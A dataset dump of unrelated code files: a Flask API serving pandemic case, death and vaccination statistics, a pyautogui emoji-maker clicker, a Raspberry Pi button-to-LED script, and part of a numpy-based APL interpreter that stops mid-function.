func.max(COVIDENTRY.totalCases).label('totalCasesConfirm'),\n # func.max(COVIDENTRY.totalDeaths).label('totalDeathsConfirm'),\n # COVIDENTRY.continent,\n # ).order_by(COVIDENTRY.location\n # ).group_by(COVIDENTRY.location, COVIDENTRY.population, COVIDENTRY.continent).all()\n response = []\n for i in covidEntries:\n response.append({\n \"Cases\": i[0],\n \"Deaths\": i[1],\n \"Country\": i[2],\n \"Year\": i[3],\n \"month\": i[4],\n })\n\n return jsonify({\"comparison-result\": response})\n except Exception as e:\n return (str(e))\n\n\n# Overall Summary API\n@app.route('/get-overall-summary-values', methods=[\"GET\"])\ndef getSummaryValues():\n try:\n\n covidentry = COVIDENTRY.query.with_entities(\n COVIDENTRY.location,\n COVIDENTRY.population,\n func.max(COVIDENTRY.totalCases).label('totalCasesConfirm'),\n func.max(COVIDENTRY.totalDeaths).label('totalDeathsConfirm'),\n COVIDENTRY.continent,\n ).order_by(COVIDENTRY.location\n ).group_by(COVIDENTRY.location, COVIDENTRY.population, COVIDENTRY.continent).all()\n response = []\n for i in covidentry:\n response.append({\n \"Country\": i[0],\n \"Population\": i[1],\n \"ConfirmCases\": i[2],\n \"ConfirmDeaths\": i[3],\n \"Continent\": i[4],\n })\n return jsonify({\"summary\": response})\n except Exception as e:\n return (str(e))\n\n\n# API for Time Series Data\n@app.route('/get-daily-time-series-values', methods=[\"GET\"])\ndef getDailyTimeSeriesConfirmedChartValues():\n try:\n start_date = datetime.strptime('2020-2-24', '%Y-%m-%d')\n end_date = datetime.strptime('2021-4-26', '%Y-%m-%d')\n if 'start_date' in request.args.to_dict():\n start_date = datetime.strptime(\n request.args.to_dict()['start_date'], '%Y-%m-%d')\n if 'end_date' in request.args.to_dict():\n end_date = datetime.strptime(\n request.args.to_dict()['end_date'], '%Y-%m-%d')\n covidentry = COVIDENTRY.query.filter(\n COVIDENTRY.location == request.args.to_dict()['location'],\n COVIDENTRY.date >= start_date,\n COVIDENTRY.date <= end_date\n ).with_entities(func.sum(COVIDENTRY.new_cases).label(\n 'totalConfirm')).order_by(COVIDENTRY.dateTimeStamp).group_by(COVIDENTRY.dateTimeStamp).all()\n coviddeathseries = COVIDENTRY.query.filter(\n COVIDENTRY.location == request.args.to_dict()['location'],\n COVIDENTRY.date >= start_date,\n COVIDENTRY.date <= end_date\n ).with_entities(\n func.sum(COVIDENTRY.new_deaths\n ).label('totalDeaths')\n ).order_by(COVIDENTRY.dateTimeStamp\n ).group_by(COVIDENTRY.dateTimeStamp).all()\n response = []\n response1 = []\n for i in covidentry:\n response.append(i[0])\n for i in coviddeathseries:\n response1.append(i[0])\n return jsonify({\"TImeSeriesChart\": response, \"TimeSeriesDeaths\": response1})\n except Exception as e:\n return (str(e))\n\n\n# API for COMPARISON Pandemics\n@app.route('/get-swine-countries', methods=[\"GET\"])\ndef getSwineCountrieResult():\n try:\n swineentry = SWINEENTRY.query.with_entities(\n SWINEENTRY.country).distinct(SWINEENTRY.country)\n countries = []\n for i in swineentry:\n countries.append(i.country)\n # print(len(countries))\n return jsonify({\"swine_countries\": countries})\n except Exception as e:\n return (str(e))\n\n\n@app.route('/get-ebola-countries', methods=[\"GET\"])\ndef getEbolaResult():\n try:\n ebolaentry = EBOLAENTRY.query.with_entities(\n EBOLAENTRY.country).distinct(EBOLAENTRY.country)\n countries = []\n for i in ebolaentry:\n countries.append(i.country)\n # print(len(countries))\n return jsonify({\"ebolaentry_countries\": countries})\n except Exception as e:\n return (str(e))\n\n\n@app.route('/get-sars-countries', methods=[\"GET\"])\ndef getSARSResult():\n try:\n sarsentry = SARSENTRY.query.with_entities(\n SARSENTRY.country).distinct(SARSENTRY.country)\n countries = []\n for i in sarsentry:\n countries.append(i.country)\n # print(len(countries))\n return jsonify({\"sars_countries\": countries})\n except Exception as e:\n return (str(e))\n\n\n@app.route('/get-pandemic-100-days-results', methods=[\"GET\"])\ndef get100DayResult():\n try:\n swine_start_date = datetime.strptime(\"23-05-2009\", \"%d-%m-%Y\")\n covid_start_date = datetime.strptime('2020-2-24', '%Y-%m-%d')\n ebola_start_date = datetime.strptime('2014-8-29', '%Y-%m-%d')\n sars_start_date = datetime.strptime('2003-3-17', '%Y-%m-%d')\n covidentry = COVIDENTRY.query.filter(\n COVIDENTRY.date >= covid_start_date,\n COVIDENTRY.date <= covid_start_date + timedelta(days=100)\n ).with_entities(func.sum(COVIDENTRY.totalCases).label(\n 'totalCases')).order_by(COVIDENTRY.dateTimeStamp).group_by(COVIDENTRY.dateTimeStamp).all()\n covid_response = []\n for i in covidentry:\n covid_response.append(i[0])\n\n # SWINE Flu Querry for 100 Days\n swineentry = SWINEENTRY.query.filter(\n SWINEENTRY.date >= swine_start_date,\n SWINEENTRY.date <= swine_start_date + timedelta(days=100)\n ).with_entities(func.sum(SWINEENTRY.confirm).label(\n 'totalCases')).order_by(SWINEENTRY.date).group_by(SWINEENTRY.date).all()\n swine_response = []\n for i in swineentry:\n swine_response.append(i[0])\n\n # Ebola Querry for 100 Days\n ebulaentry = EBOLAENTRY.query.filter(\n EBOLAENTRY.date >= ebola_start_date,\n EBOLAENTRY.date <= ebola_start_date + timedelta(days=100)\n ).with_entities(func.sum(EBOLAENTRY.confirm).label(\n 'totalCases')).order_by(EBOLAENTRY.date).group_by(EBOLAENTRY.date).all()\n ebola_response = []\n for i in ebulaentry:\n ebola_response.append(i[0])\n\n # SARS Querry for 100 Days\n sarsentry = SARSENTRY.query.filter(\n SARSENTRY.date >= sars_start_date,\n SARSENTRY.date <= sars_start_date + timedelta(days=100)\n ).with_entities(func.sum(SARSENTRY.confirm).label(\n 'totalCases')).order_by(SARSENTRY.date).group_by(SARSENTRY.date).all()\n sars_response = []\n for i in sarsentry:\n sars_response.append(i[0])\n return jsonify({\"100_days_Result\": {\n \"covid_response\": covid_response,\n \"swine_response\": swine_response,\n \"ebola_response\": ebola_response,\n \"sars_response\": sars_response\n }})\n\n except Exception as e:\n return (str(e))\n\n\n@app.route('/get-pandemic-100-days-deaths-results', methods=[\"GET\"])\ndef get100DeathsDayResult():\n try:\n swine_start_date = datetime.strptime(\"23-05-2009\", \"%d-%m-%Y\")\n covid_start_date = datetime.strptime('2020-2-24', '%Y-%m-%d')\n ebola_start_date = datetime.strptime('2014-8-29', '%Y-%m-%d')\n sars_start_date = datetime.strptime('2003-3-17', '%Y-%m-%d')\n covidentry = COVIDENTRY.query.filter(\n COVIDENTRY.date >= covid_start_date,\n COVIDENTRY.date <= covid_start_date + timedelta(days=100)\n ).with_entities(func.sum(COVIDENTRY.totalDeaths).label(\n 'totalDeaths')).order_by(COVIDENTRY.dateTimeStamp).group_by(COVIDENTRY.dateTimeStamp).all()\n covid_response = []\n for i in covidentry:\n covid_response.append(i[0])\n\n # SWINE Flu Querry for 100 Days\n swineentry = SWINEENTRY.query.filter(\n SWINEENTRY.date >= swine_start_date,\n SWINEENTRY.date <= swine_start_date + timedelta(days=100)\n ).with_entities(func.sum(SWINEENTRY.deaths).label(\n 'totalDeaths')).order_by(SWINEENTRY.date).group_by(SWINEENTRY.date).all()\n swine_response = []\n for i in swineentry:\n swine_response.append(i[0])\n\n # Ebola Querry for 100 Days\n ebulaentry = EBOLAENTRY.query.filter(\n EBOLAENTRY.date >= ebola_start_date,\n EBOLAENTRY.date <= ebola_start_date + timedelta(days=100)\n ).with_entities(func.sum(EBOLAENTRY.deaths).label(\n 'totalDeaths')).order_by(EBOLAENTRY.date).group_by(EBOLAENTRY.date).all()\n ebola_response = []\n for i in ebulaentry:\n ebola_response.append(i[0])\n\n # SARS Querry for 100 Days\n sarsentry = SARSENTRY.query.filter(\n SARSENTRY.date >= sars_start_date,\n SARSENTRY.date <= sars_start_date + timedelta(days=100)\n ).with_entities(func.sum(SARSENTRY.deaths).label(\n 'totalDeaths')).order_by(SARSENTRY.date).group_by(SARSENTRY.date).all()\n sars_response = []\n for i in sarsentry:\n sars_response.append(i[0])\n return jsonify({\"100_days_deaths_Result\": {\n \"covid_response\": covid_response,\n \"swine_response\": swine_response,\n \"ebola_response\": ebola_response,\n \"sars_response\": sars_response\n }})\n\n except Exception as e:\n return (str(e))\n\n\n# Vacocination COuntries\n@app.route('/get-vaccination-countries', methods=[\"GET\"])\ndef getVaccinationCountries():\n try:\n vaccentry = VACCINEENTRY.query.with_entities(\n VACCINEENTRY.location).distinct(VACCINEENTRY.location)\n countries = []\n for i in vaccentry:\n countries.append(i.location)\n # print(len(countries))\n return jsonify({\"countries\": countries})\n except Exception as e:\n return (str(e))\n\n\n@app.route('/get-vacc-time-chart-values', methods=[\"GET\"])\ndef getVaccineSeriesValues():\n try:\n start_date = datetime.strptime('2021-2-22', '%Y-%m-%d')\n end_date = datetime.strptime('2021-4-26', '%Y-%m-%d')\n vaccentry = VACCINEENTRY.query.filter(\n VACCINEENTRY.location == request.args.to_dict()['location'],\n VACCINEENTRY.date >= start_date,\n VACCINEENTRY.date <= end_date\n ).with_entities(\n func.sum(VACCINEENTRY.daily_vaccinations).label('totalVaccined'),\n VACCINEENTRY.date\n ).order_by(VACCINEENTRY.date).group_by(VACCINEENTRY.date).all()\n response = []\n for i in vaccentry:\n response.append({\n 'vaccines': i[0],\n 'date': i[1]\n })\n return jsonify({\"TImeSeriesVacc\": response})\n except Exception as e:\n return (str(e))\n\n\n@app.route('/get-vacc-country-values', methods=[\"GET\"])\ndef getVaccineCountryValues():\n try:\n start_date = datetime.strptime('2021-2-22', '%Y-%m-%d')\n end_date = datetime.strptime('2021-4-26', '%Y-%m-%d')\n vaccentry = VACCINEENTRY.query.filter(\n VACCINEENTRY.date >= start_date,\n VACCINEENTRY.date <= end_date\n ).with_entities(\n func.sum(VACCINEENTRY.daily_vaccinations).label('totalVaccined'),\n VACCINEENTRY.location,\n VACCINEENTRY.iso_code\n ).order_by(VACCINEENTRY.location).group_by(VACCINEENTRY.location, VACCINEENTRY.iso_code).all()\n response = []\n for i in vaccentry:\n response.append({\n 'vaccines': i[0],\n 'location': i[1],\n 'iso_code': i[2]\n })\n return jsonify({\"countries-vaccines\": response})\n except Exception as e:\n return (str(e))\n\n\nif __name__ == \"__main__\":\n app.run(host=\"127.0.0.1\", port=8080, debug=True)\n","repo_name":"waqarayub68/IV_Backend","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":28468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"3843758356","text":"import pyautogui\nimport time\nfrom random import randint\n\ndef startGame():\n pyautogui.click(1557, 291, button = 'left')\n pyautogui.click(928, 723, button = 'left')\n time.sleep(.1)\n print('Game Started')\n chooseSkin()\n\ndef chooseSkin():\n y = 845\n number = randint(0, 8)\n x = 630 + number * 80\n print(number)\n pyautogui.click(x, y, button = 'left')\n time.sleep(.1)\n print('Skin Chosen')\n chooseEyes()\n\ndef chooseEyes():\n pyautogui.click(695, 750, button = 'left')\n #-----------------\n eyelashNumber = randint(0,1)\n eyelashes = 909 + eyelashNumber * 80\n pyautogui.click(eyelashes, 849, button = 'left')\n time.sleep(.1)\n #-----------------\n colorNumber = randint(0, 7)\n print(colorNumber)\n x = 670 + colorNumber * 80\n pyautogui.click(x, 923, button = 'left')\n time.sleep(.1)\n print('Eyes Chosen')\n chooseMouth()\n\ndef chooseMouth():\n pyautogui.click(755, 750, button = 'left')\n #------------------\n colorNumber = randint(0, 2)\n print(colorNumber)\n x = 870 + colorNumber * 80\n pyautogui.click(x, 847, button = 'left')\n time.sleep(.1)\n print('Mouth Chosen')\n chooseEyebrows()\n\ndef chooseEyebrows():\n pyautogui.click(861, 750, button = 'left')\n #------------------\n thicknessNumber = randint(0,1)\n print(thicknessNumber)\n x = 913 + thicknessNumber*80\n pyautogui.click(x, 847, button = 'left')\n time.sleep(.1)\n #------------------\n colorNumber = randint(0, 12)\n if colorNumber > 9:\n pyautogui.click(1383, 919, button = 'left')\n colorClicked = 587 + (colorNumber - 3)*80\n pyautogui.click(colorClicked, 925, button = 'left')\n else:\n colorClicked = 587 + (colorNumber)*80\n pyautogui.click(colorClicked, 925, button = 'left')\n print('Eyebrows Chosen')\n \n \n\n\ndef main():\n pass\n \n","repo_name":"snoort/EmojiMaker","sub_path":"EmojiMaker.py","file_name":"EmojiMaker.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"23639984756","text":"import RPi.GPIO as GPIO\nimport time\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(17,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(18,GPIO.OUT)\n\npressed=0\nwhile True:\n\tif pressed:\n\t\tif not GPIO.input(17):\n\t\t\tpressed=0\n\telse:\n\t\tif GPIO.input(17):\n\t\t\tpressed=1\n\t\t\tif GPIO.input(18):\n\t\t\t\tGPIO.output(18,0)\n\t\t\telse:\n\t\t\t\tGPIO.output(18,1)\n\ttime.sleep(0.1)\n","repo_name":"zjrohrbach/rpi-leds","sub_path":"test-switch.py","file_name":"test-switch.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72786001736","text":"import itertools\nimport math\nfrom string import ascii_letters\nfrom typing import Callable, Optional\n\nimport numpy as np\n\nimport arr\nfrom environment import Env\nfrom errors import ArityError, DomainError, LengthError, NYIError, RankError\n\ndef nyi(*args):\n raise NotImplementedError('NYI')\n\ndef _is_int(a: np.ndarray) -> bool:\n return np.issubdtype(a.dtype, np.integer)\n\ndef _is_bool(a: np.ndarray) -> bool:\n return np.array_equal(a, a.astype(bool))\n\ndef _mkv(a: np.ndarray) -> np.ndarray:\n if a.ndim == 0:\n return a.reshape((1,))\n return a\n\ndef _shape2slice(a):\n return tuple([slice(0, dim) for dim in a])\n\ndef _fill_to_shape(a: np.ndarray, shape: tuple[int, ...]) -> np.ndarray:\n \"\"\"\n Reshape a to shape, but fill with prototype element if shapes are\n incompatible.\n \"\"\"\n prot = _prot(a)\n arr = np.empty(math.prod(shape), dtype=a.dtype)\n arr.fill(prot)\n arr = arr.reshape(shape)\n arr[_shape2slice(a.shape)] = a\n return arr\n\ndef _reshape_singleton(a: np.ndarray, shape: tuple[int, ...]) -> np.ndarray:\n \"\"\"\n If a is a singleton (length 1 vector), expand it to `shape`, \n repeating the data.\n\n For example, \n\n >>> _reshape_singleton(np.array([1]), (2,2))\n array([[1, 1],\n [1, 1]])\n\n Non-singleton arrays are left unchanged.\n \"\"\"\n if a.size != 1:\n return a\n arr = np.empty(math.prod(shape), dtype=a.dtype)\n arr.fill(a) \n return arr.reshape(shape)\n\ndef _prot_scalar(a: np.ndarray) -> np.ndarray:\n if a.ndim == 0:\n if np.issubdtype(a.dtype, np.number):\n return np.array(0)\n elif np.issubdtype(a.dtype, np.str_):\n return np.array(' ')\n return _prot(right_shoe(None, a))\n raise SyntaxError('_prot_scalar applied to non-scalar')\n \ndef _prot(a: np.ndarray) -> np.ndarray:\n \"\"\"\n Prototypal element.\n \"\"\"\n if a.ndim == 0:\n return _prot_scalar(a)\n \n first = np.array(a.ravel()[0], copy=True)\n if first.ndim == 0:\n return _prot_scalar(first)\n\n def inner(o: np.ndarray) -> None:\n \"\"\"\n Recursively set all numbers to zero and all strings to space, whilst\n keeping shape and depth nesting.\n \"\"\"\n with np.nditer(o, flags=['refs_ok'], op_flags=['readwrite']) as it: # type: ignore\n for x in it:\n if x.ndim == 0: # type: ignore\n x[...] = _prot_scalar(x) # type: ignore\n else:\n inner(right_shoe(None, x)) # type: ignore\n\n inner(first)\n return first\n\ndef mix(omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Monadic ↑ - trade depth for rank\n\n See https://aplwiki.com/wiki/Mix\n \"\"\"\n if not len(omega.shape) or not math.prod(omega.shape) or (omega.ndim == 1 and not omega.dtype == object):\n return omega\n \n shape = omega.shape\n shapes = [e.shape for e in omega]\n r = max(e.ndim for e in omega)\n\n sshapes = []\n # If ranks differ, pad shapes with 1s to the left\n for s in shapes: # (⍴↓(r⍴1)∘,)¨shapes ⍝ Prepend 1 to each shape to equal max length\n rr1 = [1]*r\n if len(s):\n rr1[-len(s):] = s\n sshapes.append(rr1)\n\n smax = np.array([max(v) for v in zip(*sshapes)]) # max per axis\n ravel = [] # type: ignore\n for i, elem in enumerate(omega):\n reshaped = _fill_to_shape(elem, tuple(sshapes[i])) # In case we added\n taken = uparrow(smax, reshaped)\n ravel.extend(taken.data)\n\n return np.array(ravel).reshape((*shape, *tuple(smax)))\n\ndef uparrow(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Monadic ↑ -- mix: https://aplwiki.com/wiki/Mix\n Dyadic ↑ -- take: https://aplwiki.com/wiki/Take\n\n Corners:\n\n [x] monadic ↑\n [x] negative take\n [x] overtake\n [x] scalar extension left\n [x] scalar extension right\n \"\"\"\n\n if alpha is None:\n return mix(omega)\n \n # Up-rank scalars to singletons\n a = _mkv(alpha)\n b = _mkv(omega)\n mag_a = abs(a)\n \n # If right is a scalar, we need to extend it to the same shape\n # as the left, filling with the prototype element of the right.\n filler = _prot(b)\n right = np.empty(math.prod(mag_a), dtype=omega.dtype)\n right.fill(filler)\n right = right.reshape(mag_a)\n\n # Generate the relevant slices for indexing,\n # respecting any negative indices.\n idx = []\n for i, axis in enumerate(a):\n if axis < 0:\n if b.size == 1:\n idx.append(slice(-1, None, 1))\n else:\n idx.append(slice(-min(abs(axis), b.shape[i]), None, 1)) \n else:\n if b.size == 1:\n idx.append(slice(0, 1, 1))\n else:\n idx.append(slice(0, min(axis, b.shape[i]), 1))\n\n if len(idx) == 1:\n idx_t = idx[0]\n else:\n idx_t = tuple(idx) # type: ignore\n\n right[idx_t] = _reshape_singleton(b, tuple(mag_a))[idx_t]\n return right\n \ndef iota(alpha: Optional[np.ndarray|str], omega: np.ndarray) -> np.ndarray:\n if alpha:\n raise NYIError('NYI ERROR: index-of (dyadic iota, a⍳b)')\n\n # Mondadic iota: index generator\n if not _is_int(omega):\n raise DomainError('DOMAIN ERROR: right arg must be integer-valued')\n \n if omega.ndim > 1:\n raise RankError(\"RANK ERROR: right arg rank must not be greater than 1\")\n\n if omega.ndim == 0:\n return np.arange(int(omega))\n \n odo = [\n np.array(c)\n for c in itertools.product(*((range(c)) for c in omega))\n ]\n a = np.empty(len(odo), dtype=object)\n a[:] = odo\n return a.reshape(omega)\n\ndef tally(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Monadic: tally\n Dyadic: not-match\n \"\"\"\n if alpha is None:\n if omega.ndim == 0:\n return np.array(1)\n return np.array(omega.shape[0])\n \n return match(alpha, omega)^1\n\ndef match(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n TODO: check how this works on enclosed items.\n \"\"\"\n if alpha is None:\n raise NotImplementedError('NYI: depth')\n \n if isinstance(alpha, np.ndarray) and isinstance(omega, np.ndarray):\n if alpha.shape != omega.shape:\n return np.array(0)\n return np.array(int(np.all([match(ai, bi) for ai, bi in zip(alpha.flat, omega.flat)])))\n else:\n return np.array(int(alpha == omega))\n \ndef rho(alpha: Optional[np.ndarray|str], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Monadic ⍴: shape\n Dyadic ⍴: reshape\n \"\"\"\n if alpha is None:\n return np.array(list(omega.shape))\n \n assert isinstance(alpha, np.ndarray)\n bound = math.prod(alpha)\n\n if omega.ndim == 0:\n return np.repeat(omega, bound).reshape(alpha)\n \n # If we already have the right number of elements, we can \n # just reshape the array == fast.\n if math.prod(omega.shape) == bound:\n return omega.reshape(alpha)\n\n # If we don't have the right number of elements, we need to\n # do some fancy itertools dance to repeat elements and/or\n # cut off a few.\n return np.array(list(itertools.islice(itertools.cycle(omega.ravel()), bound))).reshape(alpha)\n \ndef comma(alpha: Optional[np.ndarray], omega: np.ndarray, axis: int = -1) -> np.ndarray:\n \"\"\"\n Mondadic: ravel\n Dyadic: catenate last (trailling axis)\n \"\"\"\n if alpha is None:\n return np.ravel(omega)\n \n if alpha.ndim != omega.ndim:\n if omega.ndim == 0: # Scalar extension\n shape = list(alpha.shape)\n shape[-1] = 1\n return np.concatenate((alpha, omega.repeat(math.prod(shape)).reshape(shape)), axis=axis)\n raise LengthError('LENGTH ERROR')\n\n return np.concatenate((alpha, omega), axis=axis)\n\ndef right_shoe(alpha: Optional[np.ndarray], omega: np.ndarray, axis: int = 0) -> np.ndarray:\n \"\"\"\n Monadic: first/disclose\n Dyadic: pick\n\n Note: APL's enclose and disclose fit poorly with numpy's array model\n \"\"\"\n if alpha is None:\n if omega.ndim == 0: # Disclose\n return arr.disclose(omega)\n return arr.disclose(omega[0]) # First\n\n if omega.ndim == 0:\n raise LengthError('LENGTH ERROR')\n\n if alpha > omega.shape[0]:\n raise LengthError('LENGTH ERROR')\n \n return arr.disclose(omega[alpha]) # Pick\n \ndef left_shoe(alpha: Optional[np.ndarray], omega: np.ndarray, axis: int = 0) -> np.ndarray:\n if axis != 0:\n raise NYIError(\"NYI enclose with axis != 0\")\n if alpha is None:\n return arr.enclose(omega)\n raise NYIError\n\ndef rtack(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n return omega\n\ndef ltack(alpha: np.ndarray, omega: np.ndarray) -> np.ndarray:\n return alpha\n\ndef plus(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n return np.conj(omega)\n return alpha + omega\n\ndef minus(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n return -omega\n return alpha - omega\n\ndef times(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n if omega == 0:\n return np.array(0)\n return omega / abs(omega)\n return alpha * omega\n\ndef divide(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n return 1 / omega\n return alpha / omega\n \ndef replicate(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Replicate (trailling)\n \"\"\"\n if alpha is None:\n raise SyntaxError('SYNTAX ERROR')\n\n return np.repeat(omega, alpha)\n\ndef replicate_first(alpha: Optional[np.ndarray], omega: np.ndarray, axis=None) -> np.ndarray:\n \"\"\"\n Replicate (leading)\n \"\"\"\n if alpha is None:\n raise SyntaxError('SYNTAX ERROR')\n\n return np.repeat(omega, alpha, axis=0)\n\ndef gets(alpha: str, omega: np.ndarray|Callable) -> Optional[np.ndarray]:\n Env.set(alpha, omega)\n if not callable(omega):\n return omega\n return None\n\ndef reduce(left: np.ndarray|Callable, right: Optional[np.ndarray|Callable], alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Outward-facing '/' (trailling axis reduce)\n \"\"\"\n if right is not None:\n raise ArityError(\"'/' takes no right operand\")\n\n if alpha is not None:\n raise NYIError(\"left argument for function derived by '/' is not implemented yet\")\n\n assert callable(left)\n return arr.foldr(omega, operand=left, axis=omega.ndim-1)\n\ndef reduce_first(left: np.ndarray|Callable, right: Optional[np.ndarray|Callable], alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Outward-facing '⌿' (leading axis reduce)\n \"\"\"\n if right is not None:\n raise ArityError(\"'⌿' takes no right operand\")\n\n if alpha is not None:\n raise NYIError(\"left argument for function derived by '⌿' is not implemented yet\")\n\n assert callable(left)\n return arr.foldr(omega, operand=left, axis=0)\n\ndef fun_gets(left: np.ndarray|Callable, right: Optional[np.ndarray|Callable], alpha: Optional[np.ndarray|str], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n a F← b\n \"\"\"\n if right is not None:\n raise SyntaxError(\"SYNTAX ERROR: 'gets' takes no right operand\")\n\n if left is None:\n raise SyntaxError(\"SYNTAX ERROR: 'gets' expects a left operand\")\n\n if alpha is None:\n raise SyntaxError(\"SYNTAX ERROR: function derived by 'f←' takes a left argument\")\n\n if not callable(left):\n raise SyntaxError(\"SYNTAX ERROR: 'f←' expects a function operand f\")\n\n assert isinstance(omega, np.ndarray)\n assert type(alpha) == str\n\n return Env.amend(alpha, left, omega)\n\ndef each(left: np.ndarray|Callable, right: Optional[np.ndarray|Callable], alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Each ¨ - monadic operator deriving monad\n \"\"\"\n if right is not None:\n raise SyntaxError(\"SYNTAX ERROR: 'each' takes no right operand\")\n\n if left is None:\n raise SyntaxError(\"SYNTAX ERROR: 'each' expects a left operand\")\n\n if alpha is not None:\n raise SyntaxError(\"SYNTAX ERROR: function derived by 'each' takes no left argument\")\n\n if not callable(left):\n raise SyntaxError(\"SYNTAX ERROR: 'each' expects a function operand\")\n\n assert isinstance(omega, np.ndarray)\n\n return np.array([left(o) for o in omega]) # apply left operand to each element\n \ndef transpose(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n return np.transpose(omega)\n \n # Note 1: NumPy's transpose does not work with repeated axes.\n # We can hardwire the simple case of all axes == 0 to give\n # us a diagonal.\n\n if alpha.ndim == 1 and np.all(alpha == alpha[0]):\n if alpha[0] != 0:\n raise NYIError('NYI ERROR: transpose with repeated axes ≠ 0')\n return np.diagonal(omega)\n \n if alpha.ndim > 1:\n raise LengthError('LENGTH ERROR')\n \n # Note: numpy's axis spec for dyadic transpose is NOT the same \n # as APL's: we need the grade permutation of the axes.\n return np.transpose(omega, axes=np.argsort(alpha))\n\ndef grade_up(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha:\n raise NYIError('NYI ERROR: dyadic ⍋')\n \n if omega.ndim == 0:\n raise RankError('RANK ERROR')\n \n if omega.ndim == 1:\n return np.argsort(omega)\n \n if omega.ndim == 2:\n return np.lexsort(omega.T[::-1])\n \n raise NYIError('NYI ERROR: ⍋ for rank > 2')\n\ndef grade_down(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha:\n raise NYIError('NYI ERROR: dyadic ⍒')\n \n if omega.ndim == 0:\n raise RankError('RANK ERROR')\n \n if omega.ndim == 1:\n return np.argsort(omega)[::-1]\n \n if omega.ndim == 2:\n return np.lexsort(omega.T[::-1])[::-1]\n \n raise NYIError('NYI ERROR: ⍒ for rank > 2')\n\ndef encode(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n raise SyntaxError('SYNTAX ERROR: The function ⊤ requires a left argument')\n return np.array(np.unravel_index(omega, alpha))\n\ndef _decode(shape: np.ndarray, coords: np.ndarray) -> int:\n \"\"\"\n Decode -- dyadic ⊥, aka `base`\n\n Evaluates `coords` in terms of the radix system defined by `shape`.\n \n Inverse of `encode()`\n\n https://aplwiki.com/wiki/Decode\n https://xpqz.github.io/cultivations/Decode.html\n\n \"\"\"\n pos = 0\n rnk = len(shape)\n for axis in range(rnk):\n if axis >= len(coords):\n return pos\n pos += coords[axis]\n if axis != rnk - 1:\n pos *= shape[axis+1]\n return pos\n\ndef decode(alpha: np.ndarray, omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Decode - dyadic ⊥\n\n See https://aplwiki.com/wiki/Decode\n https://xpqz.github.io/cultivations/Decode.html\n https://help.dyalog.com/latest/index.htm#Language/Primitive%20Functions/Decode.htm\n\n 2 ⊥ 1 1 0 1\n \n 13\n\n 24 60 60 ⊥ 2 46 40\n\n 10000\n\n Note that we're really doing an inner product:\n\n (4 3⍴1 1 1 2 2 2 3 3 3 4 4 4)⊥3 8⍴0 0 0 0 1 1 1 1 0 0 1 1 0 0 1 1 0 1 0 1 0 1 0 1\n ┌→──────────────────┐\n ↓0 1 1 2 1 2 2 3│\n │0 1 2 3 4 5 6 7│\n │0 1 3 4 9 10 12 13│\n │0 1 4 5 16 17 20 21│\n └~──────────────────┘\n\n Dyalog's docs say:\n\n R←X⊥Y\n\n Y must be a simple numeric array. X must be a simple numeric array. R is the \n numeric array which results from the evaluation of Y in the number system with radix X.\n\n X and Y are conformable if the length of the last axis of X is the same as the length \n of the first axis of Y. A scalar or 1-element vector is extended to a vector of the \n required length. If the last axis of X or the first axis of Y has a length of 1, the \n array is extended along that axis to conform with the other argument.\n\n The shape of R is the catenation of the shape of X less the last dimension with the \n shape of Y less the first dimension. That is:\n\n ⍴R ←→ (¯1↓⍴X),1↓⍴Y\n\n For vector arguments, each element of X defines the ratio between the units for corresponding \n pairs of elements in Y. The first element of X has no effect on the result.\n\n \"\"\"\n if alpha.ndim == 0: # Extend left scalar\n return np.array(np.ravel_multi_index(omega, alpha.repeat(len(omega)))) # type: ignore\n\n if omega.ndim == 0: # A right scalar might need to be extended, too\n return np.array(np.ravel_multi_index(omega.repeat(len(alpha), alpha))) # type: ignore\n \n # If the last axis of left or the first axis of right has a length of 1, this \n # array is extended along that axis to conform with the other argument.\n if alpha.shape[-1] == 1:\n left = np.repeat(alpha, omega.shape[0], axis=-1)\n else:\n left = alpha\n\n if omega.shape[0] == 1:\n right = np.repeat(omega, alpha.shape[-1], axis=0)\n else:\n right = omega\n\n if left.shape[-1] != right.shape[0]:\n raise RankError('RANK ERROR')\n \n if left.ndim == right.ndim == 1:\n return np.array(np.ravel_multi_index(right, left)) # type: ignore\n \n # At least one side is higher-rank; we're doing an inner product\n shape = left.shape[:-1] + right.shape[1:]\n if left.ndim == 1: # Treat vector as 1-row matrix, wtf Dyalog\n left.reshape((1, left.shape[0]))\n\n ravel = []\n for lc in arr.major_cells(left):\n for rc in arr.major_cells(right.T):\n decoded = _decode(lc, rc)\n ravel.append(decoded)\n\n return np.array(ravel).reshape(shape)\n\ndef roll_deal(alpha: Optional[np.ndarray], omega: 